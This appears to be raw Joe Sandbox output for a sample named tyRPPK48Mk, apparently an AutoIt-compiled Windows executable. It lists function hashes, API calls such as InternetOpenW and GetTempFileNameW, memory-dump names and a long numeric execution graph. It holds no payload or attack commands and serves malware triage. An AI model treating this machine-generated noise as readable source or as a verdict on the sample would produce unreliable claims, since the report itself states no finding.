• Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
• Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
• Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
• Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
• Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469F45
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 547829025-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 0046A05F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 547829025-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044CE9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayCreateSafeVector_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 564309351-3724388283
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 00469FD4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: MessageSend_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 547829025-1403004172
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: _memmove
• String ID: Error:
• API String ID: 4104443479-232661952
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283

Execution Graph

Execution Coverage: 3.6%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 36
85763 4102b0 SHGetMalloc 84898->85763 84899->84896 84901 40d5f5 84899->84901 84901->84746 84901->84748 84902 40f54c 85768 410190 GetFullPathNameW 84902->85768 84904 40f559 85779 40f570 84904->85779 85841 402400 84906->85841 84908 40146f 84909 428c29 _wcscat 84908->84909 85850 401500 84908->85850 84911 40147c 84911->84909 85858 40d440 84911->85858 84913 401489 84913->84909 84914 401491 GetFullPathNameW 84913->84914 84915 402160 52 API calls 84914->84915 84916 4014bb 84915->84916 84917 402160 52 API calls 84916->84917 84918 4014c8 84917->84918 84918->84909 84919 402160 52 API calls 84918->84919 84920 4014ee 84919->84920 84920->84748 84922 428361 84921->84922 84923 4103fc LoadImageW RegisterClassExW 84921->84923 85878 44395e EnumResourceNamesW LoadImageW 84922->85878 85877 410490 7 API calls 84923->85877 84926 40d651 84928 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84926->84928 84927 428368 84928->84760 84930 409202 84929->84930 84931 42d7ad 84929->84931 84989 409216 ctype 84930->84989 86141 410940 331 API calls 84930->86141 86144 45e737 90 API calls 3 library calls 84931->86144 84934 409386 84935 40939c 84934->84935 86142 40f190 10 API calls 84934->86142 84935->84761 84995 401000 Shell_NotifyIconW __recalloc 84935->84995 84937 4095b2 84937->84935 84939 4095bf 84937->84939 84938 409253 PeekMessageW 84938->84989 86143 401a50 331 API calls 84939->86143 84941 40d410 VariantClear 84941->84989 84942 42d8cd Sleep 84942->84989 84943 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84943->84935 84946 4095f9 84943->84946 84945 42e13b 86162 40d410 VariantClear 84945->86162 84949 42e158 TranslateMessage DispatchMessageW GetMessageW 84946->84949 84949->84949 84951 42e188 84949->84951 84950 409567 PeekMessageW 84950->84989 84951->84935 84954 46fdbf 108 API calls 84990 4094e0 84954->84990 84955 46f3c1 107 API calls 84955->84989 84956 40e0a0 52 API calls 84956->84989 84957 409551 TranslateMessage DispatchMessageW 84957->84950 84959 42dcd2 WaitForSingleObject 84960 
42dcf0 GetExitCodeProcess CloseHandle 84959->84960 84959->84989 86151 40d410 VariantClear 84960->86151 84962 44c29d 52 API calls 84962->84990 84963 42dd3d Sleep 84963->84990 84965 4094cf Sleep 84965->84990 84968 42d94d timeGetTime 86147 465124 53 API calls 84968->86147 84970 40c620 timeGetTime 84970->84990 84973 465124 53 API calls 84973->84990 84974 42dd89 CloseHandle 84974->84990 84975 47d33e 309 API calls 84975->84989 84977 42de19 GetExitCodeProcess CloseHandle 84977->84990 84979 401b10 52 API calls 84979->84990 84981 42de88 Sleep 84981->84989 84984 401980 53 API calls 84984->84990 84985 45e737 90 API calls 84985->84989 84988 42e0cc VariantClear 84988->84989 84989->84934 84989->84938 84989->84941 84989->84942 84989->84945 84989->84950 84989->84955 84989->84956 84989->84957 84989->84959 84989->84963 84989->84965 84989->84968 84989->84975 84989->84985 84989->84988 84989->84990 84991 408f40 VariantClear 84989->84991 85879 4091b0 84989->85879 85937 40afa0 84989->85937 85963 408fc0 84989->85963 85998 408cc0 84989->85998 86012 4096a0 84989->86012 86139 40d150 TranslateAcceleratorW 84989->86139 86140 40d170 IsDialogMessageW GetClassLongW 84989->86140 86145 465124 53 API calls 84989->86145 86146 40c620 timeGetTime 84989->86146 86161 40e270 VariantClear ctype 84989->86161 84990->84954 84990->84962 84990->84970 84990->84973 84990->84974 84990->84977 84990->84979 84990->84981 84990->84984 84990->84989 84994 408f40 VariantClear 84990->84994 86148 45178a 54 API calls 84990->86148 86149 47d33e 331 API calls 84990->86149 86150 453bc6 54 API calls 84990->86150 86152 40d410 VariantClear 84990->86152 86153 443d19 67 API calls _wcslen 84990->86153 86154 4574b4 VariantClear 84990->86154 86155 403cd0 84990->86155 86159 4731e1 VariantClear 84990->86159 86160 4331a2 6 API calls 84990->86160 84991->84989 84994->84990 84995->84761 84996->84748 84997->84754 84999 401b16 _wcslen 84998->84999 85000 4115d7 52 API calls 84999->85000 85002 401b63 84999->85002 85001 401b4b _memmove 
85000->85001 85003 4115d7 52 API calls 85001->85003 85004 40d200 52 API calls 2 library calls 85002->85004 85003->85002 85004->84770 85005->84773 85007 40bc70 52 API calls 85006->85007 85008 401f31 85007->85008 85009 402560 85008->85009 85010 40256d __write_nolock 85009->85010 85011 402160 52 API calls 85010->85011 85013 402593 85011->85013 85023 4025bd 85013->85023 85084 401c90 85013->85084 85014 4026f0 52 API calls 85014->85023 85015 4026a7 85016 401b10 52 API calls 85015->85016 85022 4026db 85015->85022 85018 4026d1 85016->85018 85017 401b10 52 API calls 85017->85023 85088 40d7c0 52 API calls 2 library calls 85018->85088 85019 401c90 52 API calls 85019->85023 85022->84828 85023->85014 85023->85015 85023->85017 85023->85019 85087 40d7c0 52 API calls 2 library calls 85023->85087 85089 40f760 85024->85089 85027 410118 85027->84830 85029 42805d 85030 42806a 85029->85030 85145 431e58 85029->85145 85032 413748 _free 46 API calls 85030->85032 85033 428078 85032->85033 85034 431e58 82 API calls 85033->85034 85035 428084 85034->85035 85035->84830 85037 4115d7 52 API calls 85036->85037 85038 401f74 85037->85038 85038->84833 85040 4019a3 85039->85040 85046 401985 85039->85046 85041 4019b8 85040->85041 85040->85046 85748 403e10 53 API calls 85041->85748 85043 40199f 85043->84836 85045 4019c4 85045->84836 85046->85043 85747 403e10 53 API calls 85046->85747 85048 40c2c7 85047->85048 85049 40c30e 85047->85049 85052 40c2d3 85048->85052 85053 426c79 85048->85053 85050 40c315 85049->85050 85051 426c2b 85049->85051 85057 40c321 85050->85057 85058 426c5a 85050->85058 85055 426c4b 85051->85055 85056 426c2e 85051->85056 85749 403ea0 52 API calls __cinit 85052->85749 85754 4534e3 52 API calls 85053->85754 85752 4534e3 52 API calls 85055->85752 85063 40c2de 85056->85063 85751 4534e3 52 API calls 85056->85751 85750 403ea0 52 API calls __cinit 85057->85750 85753 4534e3 52 API calls 85058->85753 85063->84846 85066 401a30 85065->85066 85067 401a17 85065->85067 85068 402160 52 API calls 
85066->85068 85069 401a2d 85067->85069 85755 403c30 52 API calls _memmove 85067->85755 85070 401a3d 85068->85070 85069->84850 85070->84850 85073 411523 85072->85073 85074 4114ba 85072->85074 85758 4113a8 58 API calls 3 library calls 85073->85758 85079 40200c 85074->85079 85756 417f77 46 API calls __getptd_noexit 85074->85756 85077 4114c6 85757 417f25 10 API calls __write_nolock 85077->85757 85079->84853 85079->84854 85080->84882 85081->84885 85082->84889 85083->84889 85085 4026f0 52 API calls 85084->85085 85086 401c97 85085->85086 85086->85013 85087->85023 85088->85022 85149 40f6f0 85089->85149 85091 40f77b _strcat ctype 85157 40f850 85091->85157 85096 427c2a 85186 414d04 85096->85186 85098 40f7fc 85098->85096 85099 40f804 85098->85099 85173 414a46 85099->85173 85104 40f80e 85104->85027 85108 4528bd 85104->85108 85105 427c59 85192 414fe2 85105->85192 85107 427c79 85109 4150d1 _fseek 81 API calls 85108->85109 85110 452930 85109->85110 85689 452719 85110->85689 85113 452948 85113->85029 85114 414d04 __fread_nolock 61 API calls 85115 452966 85114->85115 85116 414d04 __fread_nolock 61 API calls 85115->85116 85117 452976 85116->85117 85118 414d04 __fread_nolock 61 API calls 85117->85118 85119 45298f 85118->85119 85120 414d04 __fread_nolock 61 API calls 85119->85120 85121 4529aa 85120->85121 85122 4150d1 _fseek 81 API calls 85121->85122 85123 4529c4 85122->85123 85124 4135bb _malloc 46 API calls 85123->85124 85125 4529cf 85124->85125 85126 4135bb _malloc 46 API calls 85125->85126 85127 4529db 85126->85127 85128 414d04 __fread_nolock 61 API calls 85127->85128 85129 4529ec 85128->85129 85130 44afef GetSystemTimeAsFileTime 85129->85130 85131 452a00 85130->85131 85132 452a36 85131->85132 85133 452a13 85131->85133 85134 452aa5 85132->85134 85135 452a3c 85132->85135 85136 413748 _free 46 API calls 85133->85136 85138 413748 _free 46 API calls 85134->85138 85695 44b1a9 85135->85695 85139 452a1c 85136->85139 85141 452aa3 85138->85141 85142 413748 _free 46 API calls 85139->85142 
85140 452a9d 85144 413748 _free 46 API calls 85140->85144 85141->85029 85143 452a25 85142->85143 85143->85029 85144->85141 85146 431e64 85145->85146 85147 431e6a 85145->85147 85148 414a46 __fcloseall 82 API calls 85146->85148 85147->85030 85148->85147 85150 425de2 85149->85150 85152 40f6fc _wcslen 85149->85152 85150->85091 85151 40f710 WideCharToMultiByte 85153 40f756 85151->85153 85154 40f728 85151->85154 85152->85151 85153->85091 85155 4115d7 52 API calls 85154->85155 85156 40f735 WideCharToMultiByte 85155->85156 85156->85091 85159 40f85d __recalloc _strlen 85157->85159 85160 40f7ab 85159->85160 85205 414db8 85159->85205 85161 4149c2 85160->85161 85217 414904 85161->85217 85163 40f7e9 85163->85096 85164 40f5c0 85163->85164 85168 40f5cd _strcat __write_nolock _memmove 85164->85168 85165 414d04 __fread_nolock 61 API calls 85165->85168 85167 425d11 85169 4150d1 _fseek 81 API calls 85167->85169 85168->85165 85168->85167 85172 40f691 __tzset_nolock 85168->85172 85305 4150d1 85168->85305 85170 425d33 85169->85170 85171 414d04 __fread_nolock 61 API calls 85170->85171 85171->85172 85172->85098 85174 414a52 _fprintf 85173->85174 85175 414a64 85174->85175 85176 414a79 85174->85176 85445 417f77 46 API calls __getptd_noexit 85175->85445 85178 415471 __lock_file 47 API calls 85176->85178 85182 414a74 _fprintf 85176->85182 85180 414a92 85178->85180 85179 414a69 85446 417f25 10 API calls __write_nolock 85179->85446 85429 4149d9 85180->85429 85182->85104 85514 414c76 85186->85514 85188 414d1c 85189 44afef 85188->85189 85682 442c5a 85189->85682 85191 44b00d 85191->85105 85193 414fee _fprintf 85192->85193 85194 414ffa 85193->85194 85195 41500f 85193->85195 85686 417f77 46 API calls __getptd_noexit 85194->85686 85197 415471 __lock_file 47 API calls 85195->85197 85199 415017 85197->85199 85198 414fff 85687 417f25 10 API calls __write_nolock 85198->85687 85201 414e4e __ftell_nolock 51 API calls 85199->85201 85202 415024 85201->85202 85688 41503d LeaveCriticalSection 
LeaveCriticalSection _fseek 85202->85688 85204 41500a _fprintf 85204->85107 85206 414dd6 85205->85206 85207 414deb 85205->85207 85214 417f77 46 API calls __getptd_noexit 85206->85214 85207->85206 85210 414df2 85207->85210 85209 414ddb 85215 417f25 10 API calls __write_nolock 85209->85215 85212 414de6 85210->85212 85216 418f98 77 API calls 6 library calls 85210->85216 85212->85159 85214->85209 85215->85212 85216->85212 85218 414910 _fprintf 85217->85218 85219 414923 85218->85219 85222 414951 85218->85222 85273 417f77 46 API calls __getptd_noexit 85219->85273 85221 414928 85274 417f25 10 API calls __write_nolock 85221->85274 85236 41d4d1 85222->85236 85225 414956 85226 41496a 85225->85226 85227 41495d 85225->85227 85228 414992 85226->85228 85229 414972 85226->85229 85275 417f77 46 API calls __getptd_noexit 85227->85275 85253 41d218 85228->85253 85276 417f77 46 API calls __getptd_noexit 85229->85276 85233 414933 @_EH4_CallFilterFunc@8 _fprintf 85233->85163 85237 41d4dd _fprintf 85236->85237 85238 4182cb __lock 46 API calls 85237->85238 85250 41d4eb 85238->85250 85239 41d560 85278 41d5fb 85239->85278 85240 41d567 85242 416b04 __malloc_crt 46 API calls 85240->85242 85244 41d56e 85242->85244 85243 41d5f0 _fprintf 85243->85225 85244->85239 85245 41d57c InitializeCriticalSectionAndSpinCount 85244->85245 85248 41d59c 85245->85248 85249 41d5af EnterCriticalSection 85245->85249 85246 418209 __mtinitlocknum 46 API calls 85246->85250 85251 413748 _free 46 API calls 85248->85251 85249->85239 85250->85239 85250->85240 85250->85246 85281 4154b2 47 API calls __lock 85250->85281 85282 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85250->85282 85251->85239 85254 41d23a 85253->85254 85255 41d255 85254->85255 85266 41d26c __wopenfile 85254->85266 85287 417f77 46 API calls __getptd_noexit 85255->85287 85257 41d25a 85288 417f25 10 API calls __write_nolock 85257->85288 85258 41d47a 85292 417f77 46 API calls __getptd_noexit 85258->85292 85259 41d48c 85284 422bf9 85259->85284 
85263 41d47f 85293 417f25 10 API calls __write_nolock 85263->85293 85264 41499d 85277 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85264->85277 85266->85258 85272 41d421 85266->85272 85289 41341f 58 API calls 2 library calls 85266->85289 85268 41d41a 85268->85272 85290 41341f 58 API calls 2 library calls 85268->85290 85270 41d439 85270->85272 85291 41341f 58 API calls 2 library calls 85270->85291 85272->85258 85272->85259 85273->85221 85274->85233 85275->85233 85276->85233 85277->85233 85283 4181f2 LeaveCriticalSection 85278->85283 85280 41d602 85280->85243 85281->85250 85282->85250 85283->85280 85294 422b35 85284->85294 85286 422c14 85286->85264 85287->85257 85288->85264 85289->85268 85290->85270 85291->85272 85292->85263 85293->85264 85295 422b41 _fprintf 85294->85295 85296 422b54 85295->85296 85299 422b8a 85295->85299 85297 417f77 __write_nolock 46 API calls 85296->85297 85298 422b59 85297->85298 85300 417f25 __write_nolock 10 API calls 85298->85300 85301 422400 __tsopen_nolock 109 API calls 85299->85301 85304 422b63 _fprintf 85300->85304 85302 422ba4 85301->85302 85303 422bcb __wsopen_helper LeaveCriticalSection 85302->85303 85303->85304 85304->85286 85308 4150dd _fprintf 85305->85308 85306 4150e9 85336 417f77 46 API calls __getptd_noexit 85306->85336 85308->85306 85309 41510f 85308->85309 85318 415471 85309->85318 85310 4150ee 85337 417f25 10 API calls __write_nolock 85310->85337 85317 4150f9 _fprintf 85317->85168 85319 415483 85318->85319 85320 4154a5 EnterCriticalSection 85318->85320 85319->85320 85322 41548b 85319->85322 85321 415117 85320->85321 85324 415047 85321->85324 85323 4182cb __lock 46 API calls 85322->85323 85323->85321 85325 415067 85324->85325 85326 415057 85324->85326 85331 415079 85325->85331 85339 414e4e 85325->85339 85394 417f77 46 API calls __getptd_noexit 85326->85394 85330 41505c 85338 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85330->85338 85356 41443c 85331->85356 85334 4150b9 85369 41e1f4 85334->85369 
85336->85310 85337->85317 85338->85317 85340 414e61 85339->85340 85341 414e79 85339->85341 85395 417f77 46 API calls __getptd_noexit 85340->85395 85343 414139 __fseek_nolock 46 API calls 85341->85343 85345 414e80 85343->85345 85344 414e66 85396 417f25 10 API calls __write_nolock 85344->85396 85347 41e1f4 __write 51 API calls 85345->85347 85348 414e97 85347->85348 85349 414ec9 85348->85349 85350 414f09 85348->85350 85355 414e71 85348->85355 85352 41e1f4 __write 51 API calls 85349->85352 85349->85355 85397 417f77 46 API calls __getptd_noexit 85350->85397 85353 414f64 85352->85353 85354 41e1f4 __write 51 API calls 85353->85354 85353->85355 85354->85355 85355->85331 85357 414455 85356->85357 85361 414477 85356->85361 85358 414139 __fseek_nolock 46 API calls 85357->85358 85357->85361 85359 414470 85358->85359 85398 41b7b2 77 API calls 4 library calls 85359->85398 85362 414139 85361->85362 85363 414145 85362->85363 85364 41415a 85362->85364 85399 417f77 46 API calls __getptd_noexit 85363->85399 85364->85334 85366 41414a 85400 417f25 10 API calls __write_nolock 85366->85400 85368 414155 85368->85334 85370 41e200 _fprintf 85369->85370 85371 41e223 85370->85371 85372 41e208 85370->85372 85374 41e22f 85371->85374 85377 41e269 85371->85377 85421 417f8a 46 API calls __getptd_noexit 85372->85421 85423 417f8a 46 API calls __getptd_noexit 85374->85423 85375 41e20d 85422 417f77 46 API calls __getptd_noexit 85375->85422 85401 41ae56 85377->85401 85379 41e234 85424 417f77 46 API calls __getptd_noexit 85379->85424 85382 41e26f 85384 41e291 85382->85384 85385 41e27d 85382->85385 85383 41e23c 85425 417f25 10 API calls __write_nolock 85383->85425 85426 417f77 46 API calls __getptd_noexit 85384->85426 85411 41e17f 85385->85411 85387 41e215 _fprintf 85387->85330 85390 41e289 85428 41e2c0 LeaveCriticalSection __unlock_fhandle 85390->85428 85391 41e296 85427 417f8a 46 API calls __getptd_noexit 85391->85427 85394->85330 85395->85344 85396->85355 85397->85355 85398->85361 85399->85366 
85400->85368 85402 41ae62 _fprintf 85401->85402 85403 41aebc 85402->85403 85404 4182cb __lock 46 API calls 85402->85404 85405 41aec1 EnterCriticalSection 85403->85405 85406 41aede _fprintf 85403->85406 85407 41ae8e 85404->85407 85405->85406 85406->85382 85408 41aeaa 85407->85408 85409 41ae97 InitializeCriticalSectionAndSpinCount 85407->85409 85410 41aeec ___lock_fhandle LeaveCriticalSection 85408->85410 85409->85408 85410->85403 85412 41aded __lseek_nolock 46 API calls 85411->85412 85413 41e18e 85412->85413 85414 41e1a4 SetFilePointer 85413->85414 85415 41e194 85413->85415 85417 41e1bb GetLastError 85414->85417 85419 41e1c3 85414->85419 85416 417f77 __write_nolock 46 API calls 85415->85416 85418 41e199 85416->85418 85417->85419 85418->85390 85419->85418 85420 417f9d __dosmaperr 46 API calls 85419->85420 85420->85418 85421->85375 85422->85387 85423->85379 85424->85383 85425->85387 85426->85391 85427->85390 85428->85387 85430 4149ea 85429->85430 85431 4149fe 85429->85431 85475 417f77 46 API calls __getptd_noexit 85430->85475 85434 41443c __flush 77 API calls 85431->85434 85443 4149fa 85431->85443 85433 4149ef 85476 417f25 10 API calls __write_nolock 85433->85476 85435 414a0a 85434->85435 85448 41d8c2 85435->85448 85439 414139 __fseek_nolock 46 API calls 85440 414a18 85439->85440 85452 41d7fe 85440->85452 85442 414a1e 85442->85443 85444 413748 _free 46 API calls 85442->85444 85447 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85443->85447 85444->85443 85445->85179 85446->85182 85447->85182 85449 414a12 85448->85449 85450 41d8d2 85448->85450 85449->85439 85450->85449 85451 413748 _free 46 API calls 85450->85451 85451->85449 85453 41d80a _fprintf 85452->85453 85454 41d812 85453->85454 85455 41d82d 85453->85455 85492 417f8a 46 API calls __getptd_noexit 85454->85492 85456 41d839 85455->85456 85461 41d873 85455->85461 85494 417f8a 46 API calls __getptd_noexit 85456->85494 85459 41d817 85493 417f77 46 API calls __getptd_noexit 85459->85493 85460 41d83e 85495 
417f77 46 API calls __getptd_noexit 85460->85495 85464 41ae56 ___lock_fhandle 48 API calls 85461->85464 85466 41d879 85464->85466 85465 41d846 85496 417f25 10 API calls __write_nolock 85465->85496 85468 41d893 85466->85468 85469 41d887 85466->85469 85497 417f77 46 API calls __getptd_noexit 85468->85497 85477 41d762 85469->85477 85471 41d81f _fprintf 85471->85442 85473 41d88d 85498 41d8ba LeaveCriticalSection __unlock_fhandle 85473->85498 85475->85433 85476->85443 85499 41aded 85477->85499 85479 41d7c8 85512 41ad67 47 API calls __write_nolock 85479->85512 85480 41d772 85480->85479 85481 41d7a6 85480->85481 85483 41aded __lseek_nolock 46 API calls 85480->85483 85481->85479 85484 41aded __lseek_nolock 46 API calls 85481->85484 85486 41d79d 85483->85486 85487 41d7b2 CloseHandle 85484->85487 85485 41d7d0 85488 41d7f2 85485->85488 85513 417f9d 46 API calls 2 library calls 85485->85513 85489 41aded __lseek_nolock 46 API calls 85486->85489 85487->85479 85490 41d7be GetLastError 85487->85490 85488->85473 85489->85481 85490->85479 85492->85459 85493->85471 85494->85460 85495->85465 85496->85471 85497->85473 85498->85471 85500 41adfa 85499->85500 85501 41ae12 85499->85501 85502 417f8a __write_nolock 46 API calls 85500->85502 85504 417f8a __write_nolock 46 API calls 85501->85504 85507 41ae51 85501->85507 85503 41adff 85502->85503 85505 417f77 __write_nolock 46 API calls 85503->85505 85506 41ae23 85504->85506 85508 41ae07 85505->85508 85509 417f77 __write_nolock 46 API calls 85506->85509 85507->85480 85508->85480 85510 41ae2b 85509->85510 85511 417f25 __write_nolock 10 API calls 85510->85511 85511->85508 85512->85485 85513->85488 85515 414c82 _fprintf 85514->85515 85516 414cc3 85515->85516 85517 414c96 __recalloc 85515->85517 85518 414cbb _fprintf 85515->85518 85519 415471 __lock_file 47 API calls 85516->85519 85541 417f77 46 API calls __getptd_noexit 85517->85541 85518->85188 85521 414ccb 85519->85521 85527 414aba 85521->85527 85522 414cb0 85542 417f25 10 API calls 
